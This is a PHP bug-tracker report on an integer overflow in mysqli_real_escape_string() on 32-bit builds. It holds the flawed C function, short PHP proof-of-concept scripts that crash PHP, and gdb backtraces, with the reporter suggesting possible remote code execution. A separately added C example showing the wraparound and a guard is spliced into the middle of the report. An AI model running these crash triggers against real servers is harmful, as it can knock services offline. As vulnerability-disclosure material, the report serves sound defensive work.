Bug #74544 Integer overflow in mysqli_real_escape_string()
Submitted: 2017-05-05 04:31 UTC Modified: 2017-06-20 06:21 UTC
From: whitehat002 at hotmail dot com Assigned:
Status: Open Package: MySQLi related
PHP Version: 7.1.5 OS:
Private report: No CVE-ID: None
 [2017-05-05 04:31 UTC] whitehat002 at hotmail dot com
Description:
------------
PHP_FUNCTION(mysqli_real_escape_string) {
	MY_MYSQL	*mysql;
	zval		*mysql_link = NULL;
	char		*escapestr;
	size_t			escapestr_len;
	zend_string *newstr;

	if (zend_parse_method_parameters(ZEND_NUM_ARGS(), getThis(), "Os", &mysql_link, mysqli_link_class_entry, &escapestr, &escapestr_len) == FAILURE) {
		return;
	}
	MYSQLI_FETCH_RESOURCE_CONN(mysql, mysql_link, MYSQLI_STATUS_VALID);

	newstr = zend_string_alloc(2 * escapestr_len, 0);  //integer overflow
	ZSTR_LEN(newstr) = mysql_real_escape_string(mysql->mysql, ZSTR_VAL(newstr), escapestr, escapestr_len);
	newstr = zend_string_truncate(newstr, ZSTR_LEN(newstr), 0);

	RETURN_NEW_STR(newstr);
}

Test script:
---------------
<?php
ini_set("memory_limit",-1);
$str=str_repeat("A",0x7fffffff);
$str.="AAAAA";
$mysqli=new mysqli("localhost","root","toor","mysql");
$mysqli->real_escape_string($str);
?>


Actual result:
--------------
root@hackyzh-virtual-machine:~# gdb -q --args ./php-7.1.4/sapi/cli/php -n poc2.php
Reading symbols from /root/php-7.1.4/sapi/cli/php...done.
(gdb) b mysqli_api.c:1968
Breakpoint 1 at 0x81ddbdc: file /root/php-7.1.4/ext/mysqli/mysqli_api.c, line 1968.
(gdb) r
Starting program: /root/php-7.1.4/sapi/cli/php -n poc2.php
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/i386-linux-gnu/libthread_db.so.1".

Breakpoint 1, zif_mysqli_real_escape_string (execute_data=0xb70130f0, 
    return_value=0xbfffc100) at /root/php-7.1.4/ext/mysqli/mysqli_api.c:1968
1968		newstr = zend_string_alloc(2 * escapestr_len, 0);
(gdb) p/x escapestr_len
$1 = 0x80000004
(gdb) p/x 2*escapestr_len
$2 = 0x8
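The wraparound the gdb session shows (2 * 0x80000004 == 0x8 on a 32-bit size_t) and the guard an allocation like this needs, as an added example that is not code from the bug report or from php-src. It models the reporter's i386 size_t with uint32_t so the arithmetic reproduces on any host; the checked variant is an illustration of an overflow guard, not the project's patch.

```c
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>

/* Added example: uint32_t stands in for the 32-bit size_t of the i386 build
 * in the report, so the same wraparound happens on a 64-bit host too. */
typedef uint32_t size32_t;

/* The computation as written in mysqli_real_escape_string():
 * 2 * escapestr_len wraps as soon as escapestr_len >= 2^31. */
static size32_t escape_buf_size_unchecked(size32_t escapestr_len)
{
    return (size32_t)(2u * escapestr_len);
}

/* Guarded version: refuse any length whose doubled value is not
 * representable. Returns true and sets *out on success, false on overflow;
 * the caller must fail the call instead of allocating a too-small buffer. */
static bool escape_buf_size_checked(size32_t escapestr_len, size32_t *out)
{
    if (escapestr_len > UINT32_MAX / 2u) {
        return false;
    }
    *out = (size32_t)(2u * escapestr_len);
    return true;
}

/* Convenience wrapper for callers that only need the answer: 0 on overflow
 * (0 is never a valid result for a non-empty input, so it is unambiguous). */
static size32_t escape_buf_size_or_zero(size32_t escapestr_len)
{
    size32_t n;
    return escape_buf_size_checked(escapestr_len, &n) ? n : 0;
}

int main(void)
{
    size32_t len = 0x80000004u;   /* the escapestr_len gdb printed in the report */
    printf("unchecked: 2 * 0x%x = 0x%x (an 8-byte buffer for a 2 GiB input)\n",
           len, escape_buf_size_unchecked(len));
    printf("checked:   %s\n",
           escape_buf_size_or_zero(len) ? "ok" : "rejected, would overflow");
    return 0;
}
```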


Patches

bug74544.diff (last revision 2017-07-24 10:11 UTC by johannes at schlueters dot de)


Pull Requests


History

 [2017-05-09 08:17 UTC] whitehat002 at hotmail dot com
In php-7.0.1, I used this script to test. Then it crashes. In others, it does not. I do not know why the same code will have different results.
_____________________________________________________________________

<?php
ini_set("memory_limit",-1);
$str=str_repeat("A",0x7ffffff0);
$mysqli=new mysqli("localhost","root","toor","mysql");
$mysqli->real_escape_string($str);
?>
_____________________________________________________________________

hackyzh@ubuntu:~/Downloads$ gdb -q --args ./php-7.0.1/sapi/cli/php -n ../Desktop/poc.php
Reading symbols from /home/hackyzh/Downloads/php-7.0.1/sapi/cli/php...done.
(gdb) r
Starting program: /home/hackyzh/Downloads/php-7.0.1/sapi/cli/php -n ../Desktop/poc.php
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/i386-linux-gnu/libthread_db.so.1".

Warning: String is not zero-terminated (@��) (source: /home/hackyzh/Downloads/php-7.0.1/Zend/zend_vm_execute.h:858) in /home/hackyzh/Desktop/poc.php on line 6
[Tue May  9 16:11:53 2017]  Script:  '/home/hackyzh/Desktop/poc.php'

Program received signal SIGSEGV, Segmentation fault.
0x08474ed6 in format_converter (odp=0xbfffc974, 
    fmt=0x8b365a5 "s(%d) : Actual location (location was relayed)\n", 
    ap=0xbfffc9e0 "") at /home/hackyzh/Downloads/php-7.0.1/main/snprintf.c:993
993							s_len = strlen(s);
(gdb) bt
#0  0x08474ed6 in format_converter (odp=0xbfffc974, 
    fmt=0x8b365a5 "s(%d) : Actual location (location was relayed)\n", 
    ap=0xbfffc9e0 "") at /home/hackyzh/Downloads/php-7.0.1/main/snprintf.c:993
#1  0x08475719 in strx_printv (ccp=0xbfffc9b8, 
    buf=0xbfffda4c "Tue May  9 16:11:53 2017", len=512, 
    format=0x8b365a4 "%s(%d) : Actual location (location was relayed)\n", 
    ap=0xbfffc9dc "\377\377\377\377")
    at /home/hackyzh/Downloads/php-7.0.1/main/snprintf.c:1248
#2  0x08475817 in ap_php_snprintf (buf=0xbfffda4c "Tue May  9 16:11:53 2017", 
    len=512, 
    format=0x8b365a4 "%s(%d) : Actual location (location was relayed)\n")
    at /home/hackyzh/Downloads/php-7.0.1/main/snprintf.c:1293
#3  0x08471625 in php_message_handler_for_zend (message=4, data=0xbfffdcbc)
    at /home/hackyzh/Downloads/php-7.0.1/main/main.c:1435
#4  0x084eca9e in zend_message_dispatcher (message=4, data=0xbfffdcbc)
    at /home/hackyzh/Downloads/php-7.0.1/Zend/zend.c:999
#5  0x084c1af9 in zend_mm_check_leaks (heap=0xb7000040)
    at /home/hackyzh/Downloads/php-7.0.1/Zend/zend_alloc.c:2121
#6  0x084c1d99 in zend_mm_shutdown (heap=0xb7000040, full=0, silent=0)
    at /home/hackyzh/Downloads/php-7.0.1/Zend/zend_alloc.c:2193
#7  0x084c2acf in shutdown_memory_manager (silent=0, full_shutdown=0)
    at /home/hackyzh/Downloads/php-7.0.1/Zend/zend_alloc.c:2629
#8  0x0847204d in php_request_shutdown (dummy=0x0)
    at /home/hackyzh/Downloads/php-7.0.1/main/main.c:1833
#9  0x08598c13 in do_cli (argc=3, argv=0x8c1cd30)
    at /home/hackyzh/Downloads/php-7.0.1/sapi/cli/php_cli.c:1142
#10 0x0859942a in main (argc=3, argv=0x8c1cd30)
    at /home/hackyzh/Downloads/php-7.0.1/sapi/cli/php_cli.c:1345
 [2017-05-11 09:17 UTC] whitehat002 at hotmail dot com
I found a way to make it crash. It seems to be able to execute remote code.
<?php
ini_set("memory_limit",-1);
$str=str_repeat("A",0x7fffffff);
$str.="AA";
$mysqli=new mysqli("localhost","root","toor","mysql");
$v=$mysqli->real_escape_string($str); 
$mysqli->query($v);           
?>
_______________________________________________________
Program received signal SIGSEGV, Segmentation fault.
0xb7a63976 in ?? () from /lib/i386-linux-gnu/libc.so.6
(gdb) bt
#0  0xb7a63976 in ?? () from /lib/i386-linux-gnu/libc.so.6
#1  0x08349eaf in php_mysqlnd_cmd_write (_packet=0xb7068038)
    at /usr/include/i386-linux-gnu/bits/string3.h:52
#2  0x08349a4b in mysqlnd_mysqlnd_protocol_send_command_pub (
    payload_decoder_factory=0xb706f000, command=COM_QUERY, arg=0xb7002080 "\220 ", 
    arg_len=4294967295, silent=0 '\000', connection_state=0xb706663c, 
    error_info=0xb7066424, upsert_status=0xb70663fc, stats=0xb7002050, 
    send_close=0x83422a0 <mysqlnd_mysqlnd_conn_data_send_close_pub>, 
    send_close_ctx=0xb7066380)
    at /root/php-7.1.4/ext/mysqlnd/mysqlnd_wireprotocol.c:2772
#3  0x08358e6c in mysqlnd_com_query_run (cmd=0xb70543d8)
    at /root/php-7.1.4/ext/mysqlnd/mysqlnd_commands.c:644
#4  0x08342040 in mysqlnd_mysqlnd_conn_data_send_query_pub (conn=0xb7066380, 
    query=0xb7002080 "\220 ", query_len=4294967295, type=MYSQLND_SEND_QUERY_IMPLICIT, 
    read_cb=0x0, err_cb=0x0) at /root/php-7.1.4/ext/mysqlnd/mysqlnd_connection.c:889
#5  0x08344a04 in mysqlnd_mysqlnd_conn_data_query_pub (query_len=4294967295, 
    query=0xb7002080 "\220 ", conn=0xb7066380)
    at /root/php-7.1.4/ext/mysqlnd/mysqlnd_connection.c:858
#6  mysqlnd_mysqlnd_conn_data_query_pub (conn=0xb7066380, query=0xb7002080 "\220 ", 
    query_len=4294967295) at /root/php-7.1.4/ext/mysqlnd/mysqlnd_connection.c:850
#7  0x081e391a in zif_mysqli_query (execute_data=0xb7013120, return_value=0xbfffc100)
    at /root/php-7.1.4/ext/mysqli/mysqli_nonapi.c:593
#8  0x084558e3 in ZEND_DO_FCALL_SPEC_RETVAL_UNUSED_HANDLER (execute_data=0xb7013020)
    at /root/php-7.1.4/Zend/zend_vm_execute.h:970
#9  0x084093be in execute_ex (ex=0xb7013020)
    at /root/php-7.1.4/Zend/zend_vm_execute.h:432
#10 0x0845770f in zend_execute (op_array=0xb7069180, return_value=0x0)
    at /root/php-7.1.4/Zend/zend_vm_execute.h:474
#11 0x083c15c0 in zend_execute_scripts (type=8, retval=0x0, file_count=3)
    at /root/php-7.1.4/Zend/zend.c:1476
#12 0x08362a0d in php_execute_script (primary_file=0xbfffe464)
    at /root/php-7.1.4/main/main.c:2537
#13 0x08459824 in do_cli (argc=3, argv=0x8a8d868)
    at /root/php-7.1.4/sapi/cli/php_cli.c:993
#14 0x080785ad in main (argc=3, argv=0x8a8d868)
    at /root/php-7.1.4/sapi/cli/php_cli.c:1381
 [2017-05-12 02:08 UTC] whitehat002 at hotmail dot com
-PHP Version: 7.1.4 +PHP Version: 7.1.5
 [2017-05-12 02:08 UTC] whitehat002 at hotmail dot com
In the new PHP version, it also has the same bug.
 [2017-05-15 09:44 UTC] whitehat002 at hotmail dot com
Has anyone solved it?
 [2017-05-17 08:14 UTC] whitehat002 at hotmail dot com
gdb-peda$ r
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/i386-linux-gnu/libthread_db.so.1".

Program received signal SIGSEGV, Segmentation fault.

[----------------------------------registers-----------------------------------]
EAX: 0xb719409b --> 0x0 
EBX: 0xb7ab0000 --> 0x1abda8 
ECX: 0xffe6df64 
EDX: 0xb71fffa0 --> 0x0 
ESI: 0xb7002050 --> 0xb7061600 --> 0x5e ('^')
EDI: 0xb70600f0 --> 0xb706e000 --> 0x2000000 
EBP: 0x57f7 
ESP: 0xbfffbef8 --> 0xffffffff 
EIP: 0xb7a3a666 (<__memcpy_ssse3_rep+3510>:	movntdq XMMWORD PTR [edx+0x60],xmm6)
EFLAGS: 0x210282 (carry parity adjust zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0xb7a3a657 <__memcpy_ssse3_rep+3495>:	movntdq XMMWORD PTR [edx+0x30],xmm3
   0xb7a3a65c <__memcpy_ssse3_rep+3500>:	movntdq XMMWORD PTR [edx+0x40],xmm4
   0xb7a3a661 <__memcpy_ssse3_rep+3505>:	movntdq XMMWORD PTR [edx+0x50],xmm5
=> 0xb7a3a666 <__memcpy_ssse3_rep+3510>:	movntdq XMMWORD PTR [edx+0x60],xmm6
   0xb7a3a66b <__memcpy_ssse3_rep+3515>:	movntdq XMMWORD PTR [edx+0x70],xmm7
   0xb7a3a670 <__memcpy_ssse3_rep+3520>:	lea    edx,[edx+0x80]
   0xb7a3a676 <__memcpy_ssse3_rep+3526>:	jae    0xb7a3a605 <__memcpy_ssse3_rep+3413>
   0xb7a3a678 <__memcpy_ssse3_rep+3528>:	add    ecx,0x80
[------------------------------------stack-------------------------------------]
0000| 0xbfffbef8 --> 0xffffffff 
0004| 0xbfffbefc --> 0x834a14f (<php_mysqlnd_cmd_write+543>:	mov    edx,DWORD PTR [esp+0x2c])
0008| 0xbfffbf00 --> 0xb706e005 --> 0xb7002090 --> 0xb70020a0 --> 0xb70020b0 --> 0xb70020c0 (--> ...)
0012| 0xbfffbf04 --> 0xb7002080 --> 0xb7002090 --> 0xb70020a0 --> 0xb70020b0 --> 0xb70020c0 (--> ...)
0016| 0xbfffbf08 --> 0xffffffff 
0020| 0xbfffbf0c --> 0x8348267 (<_mysqlnd_pecalloc+151>:	jmp    0x8348211 <_mysqlnd_pecalloc+65>)
0024| 0xbfffbf10 --> 0x4 
0028| 0xbfffbf14 --> 0xb7054478 ("toor")
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
__memcpy_ssse3_rep () at ../sysdeps/i386/i686/multiarch/memcpy-ssse3-rep.S:1300
1300	../sysdeps/i386/i686/multiarch/memcpy-ssse3-rep.S: No such file or directory.
gdb-peda$ bt
#0  __memcpy_ssse3_rep () at ../sysdeps/i386/i686/multiarch/memcpy-ssse3-rep.S:1300
#1  0x0834a14f in php_mysqlnd_cmd_write (_packet=0xb7068038)
    at /usr/include/i386-linux-gnu/bits/string3.h:52
#2  0x08349ceb in mysqlnd_mysqlnd_protocol_send_command_pub (
    payload_decoder_factory=0xb706f000, command=COM_QUERY, arg=0xb7002080 "\220 ", 
    arg_len=0xffffffff, silent=0x0, connection_state=0xb706663c, 
    error_info=0xb7066424, upsert_status=0xb70663fc, stats=0xb7002050, 
    send_close=0x8342540 <mysqlnd_mysqlnd_conn_data_send_close_pub>, 
    send_close_ctx=0xb7066380)
    at /root/php-7.1.5/ext/mysqlnd/mysqlnd_wireprotocol.c:2772
#3  0x0835910c in mysqlnd_com_query_run (cmd=0xb70544b0)
    at /root/php-7.1.5/ext/mysqlnd/mysqlnd_commands.c:644
#4  0x083422e0 in mysqlnd_mysqlnd_conn_data_send_query_pub (conn=0xb7066380, 
    query=0xb7002080 "\220 ", query_len=0xffffffff, type=MYSQLND_SEND_QUERY_IMPLICIT, 
    read_cb=0x0, err_cb=0x0) at /root/php-7.1.5/ext/mysqlnd/mysqlnd_connection.c:889
#5  0x08344ca4 in mysqlnd_mysqlnd_conn_data_query_pub (query_len=0xffffffff, 
    query=0xb7002080 "\220 ", conn=0xb7066380)
    at /root/php-7.1.5/ext/mysqlnd/mysqlnd_connection.c:858
#6  mysqlnd_mysqlnd_conn_data_query_pub (conn=0xb7066380, query=0xb7002080 "\220 ", 
    query_len=0xffffffff) at /root/php-7.1.5/ext/mysqlnd/mysqlnd_connection.c:850
#7  0x081e3b1a in zif_mysqli_query (execute_data=0xb7013120, return_value=0xbfffc100)
    at /root/php-7.1.5/ext/mysqli/mysqli_nonapi.c:593
#8  0x08455c93 in ZEND_DO_FCALL_SPEC_RETVAL_UNUSED_HANDLER (execute_data=0xb7013020)
    at /root/php-7.1.5/Zend/zend_vm_execute.h:970
#9  0x0840969e in execute_ex (ex=0xb7013020)
    at /root/php-7.1.5/Zend/zend_vm_execute.h:432
#10 0x08457abf in zend_execute (op_array=0xb7069180, return_value=0x0)
    at /root/php-7.1.5/Zend/zend_vm_execute.h:474
#11 0x083c1890 in zend_execute_scripts (type=0x8, retval=0x0, file_count=0x3)
    at /root/php-7.1.5/Zend/zend.c:1476
#12 0x08362cad in php_execute_script (primary_file=0xbfffe464)
    at /root/php-7.1.5/main/main.c:2537
#13 0x08459bd4 in do_cli (argc=0x3, argv=0x8a8e868)
    at /root/php-7.1.5/sapi/cli/php_cli.c:993
#14 0x080785ad in main (argc=0x3, argv=0x8a8e868)
    at /root/php-7.1.5/sapi/cli/php_cli.c:1381
#15 0xb791daf3 in __libc_start_main () from /lib/i386-linux-gnu/libc.so.6
#16 0x08078641 in _start ()
——————————————————————————————————————————————————————
It seems to lead to a buffer overflow.
 [2017-06-20 06:21 UTC] stas@php.net
-Type: Security +Type: Bug
 
PHP Copyright © 2001-2017 The PHP Group
All rights reserved.
Last updated: Sat Nov 18 15:03:12 2017 UTC